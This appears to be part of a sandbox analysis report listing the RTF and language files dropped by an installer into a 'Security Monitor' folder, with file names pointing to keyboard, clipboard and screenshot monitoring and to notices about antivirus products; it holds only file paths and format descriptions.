C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-720Q2.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-ACG6U.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-AH45L.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-GBV95.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-HJJQD.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-J6MD8.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-KA2FL.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-M105C.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-PIE2I.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-PVRKU.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-QQI5E.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-QRF0E.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-R22GO.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-S7MME.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-TP91V.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-UJC8G.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-VG6LT.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-0BOKU.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-0SQMV.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-3DBI9.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-4RJAB.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-6Q94L.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-95QQQ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-A4C13.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-AAUJ9.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-AOHKI.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-ENNH9.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-IHGP9.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-J3QUS.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-O0VLJ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-OCVN6.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-QVVKA.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-RAUGO.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-RUEHO.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english.lng (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\360_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\AVG_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Avast_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Avira_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Kaspersky_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\McAfee_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\eset_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-01IDQ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-065KQ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-08MQF.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-0CK62.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-1I8EP.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-42CJH.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-642F2.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-9JH0K.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-BBT1L.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-BSI65.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-D2P5E.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-E2TEI.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-HUSE3.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-JJ2T4.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-LG5KD.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-M20SH.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-OJ58C.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-OP3RK.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-SFHSQ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-SGNRO.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-SHQC5.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-T2L17.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-T6LGH.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-UJP2L.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-V6A58.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\norton_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-1PO1U.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-2DQMJ.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-2KUMK.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-5Q68O.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-6OR2S.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-7M1KR.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-D5VGT.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-DAFPP.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-FUD1N.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-GF9HA.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-GLE8G.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-IN9UP.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-LJVKK.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-M9T24.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-OPQK6.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-Q8JL9.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-RKDP4.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
